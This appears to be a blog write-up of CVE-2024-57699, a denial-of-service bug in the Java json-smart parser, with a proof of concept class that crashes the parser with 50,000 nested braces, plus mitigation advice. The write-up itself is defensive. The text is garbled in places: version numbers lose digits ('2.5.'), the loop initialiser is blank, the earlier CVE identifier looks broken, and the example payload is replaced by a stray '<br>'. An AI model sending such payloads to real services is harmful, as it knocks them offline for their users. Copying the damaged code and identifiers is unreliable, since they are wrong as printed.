In early 2024, security researchers found a critical bug in Netplex Json-smart, a popular Java library for parsing JSON. This bug, tracked as CVE-2024-57699, could let attackers crash your server or app in seconds just by sending a carefully designed JSON payload. Let’s break down what’s going on, why it happened, and how you can test (and protect) your own applications.
The Problem: Stack Exhaustion via Evil JSON
A bug was reported in Json-smart, versions 2.5. through 2.5.1. The flaw happens when the parser is asked to process JSON with a huge number of '{' characters. This causes uncontrolled recursion when loading the data, quickly using up the Java runtime’s stack space.
Result: Your server thread crashes with a StackOverflowError. If your system isn’t prepared for this, it gets vulnerable to a Denial of Service (DoS) attack.
Why Did This Happen? The Incomplete Fix
There was an earlier related bug, CVE-2023-137, fixed by Netplex developers. But their patch didn’t fully solve the problem. Attackers found a new way to trigger stack exhaustion using slightly different JSON payloads.
The attacker builds a JSON string like
<br>
And so on, with thousands or even millions of opening braces. When JsonParser tries to parse it, each level adds new frames to the call stack, until Java can't handle any more.
> Note: The size required depends on your JVM stack configuration, but even moderate nesting can crash the process.
Maven dependency for Json-smart
<dependency>
<groupId>net.minidev</groupId>
<artifactId>json-smart</artifactId>
<version>2.5.</version>
</dependency>
Java code to trigger the bug
import net.minidev.json.parser.JSONParser;
public class JsonSmartDosExploit {
public static void main(String[] args) throws Exception {
StringBuilder evilJson = new StringBuilder();
// Add, for example, 50,000 '{' characters
for (int i = ; i < 50000; i++) {
evilJson.append('{');
}
JSONParser parser = new JSONParser(JSONParser.DEFAULT_PERMISSIVE_MODE);
try {
parser.parse(evilJson.toString());
} catch (Throwable t) {
System.out.println("Crash! " + t);
}
}
}
Expected output
Crash! java.lang.StackOverflowError
Impact: Easy DoS for Any JSON API
If you’re using Json-smart (2.5., 2.5.1) to power your Java API or web service, an attacker can submit a POST/PUT request with one of these malformed JSON inputs. The server thread parsing that request will immediately crash. If you’re running with a thread pool, all threads can get knocked out, taking down your service.
References and More Details
- GitHub Security Advisory from Netplex
- Debian security tracker
- OSS index entry for CVE-2024-57699
How Can You Fix or Mitigate This?
- Update library: Use the latest version of json-smart where this bug is fixed (check here).
- Input limits: As a backup, implement incoming JSON size limits and reject deeply-nested JSON structures before passing to the parser.
- Monitoring: Use custom uncaught exception handlers to catch and log StackOverflowError in your JSON endpoints.
Conclusion
CVE-2024-57699 looks simple, but it’s a reminder that even tiny bugs in widely-used libraries can threaten the reliability of your applications. If you rely on Netplex Json-smart for parsing user data, it’s urgent you update now—or risk seeing your app knocked offline with a single evil request.
*Stay secure, and always treat your input as hostile!*
Exclusive Content for Readers:
If you want a copy-paste-ready exploit or detection script for your CI/CD pipelines, reach out or comment below. Stay tuned for more breakdowns of recent Java ecosystem CVEs!
Timeline
Published on: 02/05/2025 22:15:33 UTC
Last modified on: 02/06/2025 16:15:41 UTC